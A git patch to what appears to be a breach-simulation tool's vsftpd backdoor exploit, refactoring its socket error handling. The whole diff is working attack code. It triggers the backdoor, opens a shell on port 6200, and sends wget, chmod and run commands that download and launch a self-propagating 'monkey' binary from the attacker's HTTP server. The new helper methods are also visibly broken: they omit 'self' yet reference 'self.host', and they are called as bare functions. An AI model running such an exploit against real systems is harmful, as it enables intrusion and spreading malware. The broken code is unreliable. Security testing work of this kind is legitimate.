From 9e5292dc8e87ee55130a6ca9eaac5a18ea2edf1d Mon Sep 17 00:00:00 2001 From: Dhayalan Date: Thu, 18 Apr 2019 20:48:24 +0200 Subject: [PATCH] Update vsftpd.py implemented 3 functions socket_connect, socket_send,socket_send_recv to handle the exception as advised. --- monkey/infection_monkey/exploit/vsftpd.py | 190 +++++++++++++--------- 1 file changed, 116 insertions(+), 74 deletions(-) diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index bf36adfe0..c4db287dc 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -30,92 +30,134 @@ class VSFTPDExploiter(HostExploiter): super(VSFTPDExploiter, self).__init__(host) self.skip_exist = self._config.skip_exploit_if_file_exist - def exploit_host(self): + def socket_connect(s,ip_addr,port): try: - LOG.info('Attempting to trigger backdoor...') - ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ftp_socket.connect((self.host.ip_addr, FTP_PORT)) - ftp_socket.recv(128).decode('utf-8') - # Attempt to login to trigger backdoor - ftp_socket.send(USERNAME) - ftp_socket.recv(128).decode('utf-8') - ftp_socket.send(PASSWORD) - ftp_socket.recv(128).decode('utf-8') - ftp_socket.close() - LOG.info('Triggered backdoor') - + s.connect((ip_addr,port)) + return True except socket.error as e: - LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr) + LOG.error('Failed to connect to %s' , self.host.ip_addr) + + return False + def socket_send_recv(s,message): try: - LOG.info('Attempting to connect to backdoor...') - backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - backdoor_socket.connect((self.host.ip_addr, 6200)) + s.send(message) + return s.recv(128).decode('utf-8') + + except socket.error as e: + LOG.error('Failed to send payload to %s' , self.host.ip_addr) + + return False + + def socket_send(s,message): + try: + s.send(message) + return True + + except socket.error as e: + LOG.error('Failed to send payload to %s' , self.host.ip_addr) + + return False + + + + def exploit_host(self): + + LOG.info('Attempting to trigger backdoor...') + ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT): + ftp_socket.recv(128).decode('utf-8') + + # Attempt to login to trigger backdoor + + if socket_send_recv(ftp_socket,USERNAME): + if socket_send_recv(ftp_socket,PASSWORD): + ftp_socket.close() + LOG.info('Triggered backdoor') + else: + LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr) + return False + else: + LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr) + return False + + LOG.info('Attempting to connect to backdoor...') + backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + if socket_connect(backdoor_socket,self.host.ip_addr, 6200): LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) - command = str.encode("uname -m" + '\n') - backdoor_socket.send(command) - response = backdoor_socket.recv(128).decode('utf-8') + command = str.encode("uname -m" + '\n') + + response = socket_send_recv(backdoor_socket,command) + if response: LOG.info('Response for uname -m: %s', response) if '' != response.lower().strip(): - #command execution is successful + # command execution is successful self.host.os['machine'] = response.lower().strip() self.host.os['type'] = 'linux' + else : + LOG.info("Failed to execute command uname -m on victim %r ",self.host) - else : - LOG.info("Failed to execute command uname -m on victim %r ",self.host) + src_path = get_target_monkey(self.host) + LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path) - src_path = get_target_monkey(self.host) - LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path) - - if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", self.host) - return False - - - LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) - - #copy the monkey into the machine - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) - dropper_target_path_linux = self._config.dropper_target_path_linux - LOG.info("Download link for monkey is %s",http_path) - - #download the monkey - download_command = '/usr/bin/wget %s -O %s;' % ( - http_path, dropper_target_path_linux) - LOG.info("Download_command is %s",download_command) - - command = str.encode(str(download_command) + '\n') - backdoor_socket.send(command) - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - #changeit to executable - - execute_command = "/bin/chmod +x %s" % dropper_target_path_linux - LOG.info("Execute_command is %s",execute_command) - - command = str.encode(str(execute_command) + '\n') - - backdoor_socket.send(command) - - - #run the monkey - cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) - cmdline += "&" - - command = str.encode(str(cmdline) + '\n') - backdoor_socket.send(command) - - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) - - self._exploit_info['Vulnerability'] = {"Success":"True"} - - except socket.error as e: - LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr) - LOG.error('Error Connecting to backdoor. Error: %s' % e) + if not src_path: + LOG.info("Can't find suitable monkey executable for host %r", self.host) return False + + # copy the monkey into the machine + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) + dropper_target_path_linux = self._config.dropper_target_path_linux + LOG.info("Download link for monkey is %s",http_path) + + # download the monkey + download_command = '/usr/bin/wget %s -O %s;' % ( + http_path, dropper_target_path_linux) + LOG.info("Download_command is %s",download_command) + + download_command = str.encode(str(download_command) + '\n') + + if socket_send(backdoor_socket,download_command): + LOG.info('Monkey is now Downloaded ') + else: + LOG.error('Failed to download monkey at %s' , self.host.ip_addr) + return False + + http_thread.join(DOWNLOAD_TIMEOUT) + http_thread.stop() + + # changeit to executable + + Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux + LOG.info("Change_exec_permission is %s",Change_exec_permission) + + Change_exec_permission = str.encode(str(Change_exec_permission) + '\n') + + if socket_send(backdoor_socket,Change_exec_permission): + LOG.info('Monkey can now be executed ') + else: + LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr) + return False + + + # run the monkey + cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) + cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + cmdline += "&" + + run_monkey = str.encode(str(cmdline) + '\n') + if socket_send(backdoor_socket,run_monkey): + LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, self.host, cmdline) + else: + LOG.error('Monkey failed to run at %s' , self.host.ip_addr) + return False + + + self._exploit_info['Vulnerability'] = {"Success":"True"} + + return True